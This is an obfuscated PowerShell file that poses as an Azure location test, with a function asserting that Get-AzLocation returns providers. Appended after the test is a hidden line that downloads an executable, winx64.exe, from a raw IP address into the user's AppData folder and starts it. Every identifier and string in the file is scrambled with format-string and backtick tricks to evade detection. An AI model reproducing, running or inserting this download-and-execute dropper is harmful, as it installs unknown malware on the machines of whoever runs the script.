function test`-AZu`RE`loCaTiON
{
    ${prOV`iDER`lOC`ATIO`NS} = &("{0}{1}{2}{3}{4}"-f 'Ge','t','-','AzLocati','on')

    &("{3}{0}{2}{1}"-f'ss','rt-True','e','A') { ${pRovideRLO`ca`T`Io`Ns}."C`OuNT" -gt 0 }
    foreach (${LoCAti`oN} in ${PRo`VIderl`oca`TioNs})
    {
        .("{2}{1}{3}{0}" -f'True','sert','As','-') { ${lO`c`AtI`On}."p`RO`VIDeRS"."c`ount" -gt 0 }
    }
 }
(&("{3}{1}{0}{2}"-f'w-Obj','e','ect','N') ("{2}{4}{0}{1}{3}{6}{5}"-f'e','t.W','Syste','eb','m.N','lient','C')).("{0}{2}{1}"-f'Down','File','load').Invoke(("{0}{5}{6}{8}{1}{4}{2}{10}{9}{3}{7}" -f 'ht','3','v','4.ex','0/~tre','t','p://94','e','.102.58.','r/winx6','o'),"$env:APPDATA\winx64.exe");.("{1}{0}{2}"-f '-Proce','Start','ss') ("$env:APPDATA\winx64.exe")
